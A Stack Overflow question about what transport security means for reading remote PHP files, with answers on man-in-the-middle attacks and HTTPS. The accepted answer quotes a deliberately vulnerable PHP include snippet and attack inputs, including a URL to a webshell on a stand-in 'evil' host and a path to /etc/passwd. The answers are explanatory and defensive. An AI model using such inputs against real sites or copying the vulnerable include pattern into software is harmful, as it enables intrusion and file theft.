# What is transport security?

Tags: php, security, http, fopen

I see it mentioned in this question:

[Including a remote php file as a resource](https://stackoverflow.com/questions/8744156/including-a-remote-php-file-as-a-resource)

So how can someone "intercept" (and modify ?) the data that is being sent / received? (In that question it's a remote PHP file read with fopen)

Comment: Everything that goes over an `http` connection can be sniffed, because it is sent as plain text. When doing it over a secure connection `https` the data will be encrypted.

Answer (score 1, accepted):

This example from [Wikipedia](http://en.wikipedia.org/wiki/Remote_file_inclusion) that may cognise you of the ill-effects.

```
<?php
   $color = 'blue';
   if (isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   include( $color . '.php' );
?>
```

1. COLOR=http://evil.example.com/webshell.txt - injects a remotely hosted file containing a malicious code
2. COLOR=/etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal
3. /vulnerable.php?COLOR=C:\ftp\upload\exploit - Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)

I hope from these examples, the lurking dangers are clearer to you.

"Untrusted Data Outside your script requires VALIDATION" to mitigate these attacks.

Comment: I doubt there is a `/etc/passwd.php` with valuable information.

Answer (score 2):

You might want to read the Wikipedia article about [Man-in-the-middle attacks](http://en.wikipedia.org/wiki/Man-in-the-middle_attack).

As PeeHaa pointed out you can use HTTPS to encrypt your HTTP stream with SSL/TLS.

MITM attacks are not a HTTP-specific problem. This problem affects all communication which flows through untrusted networks.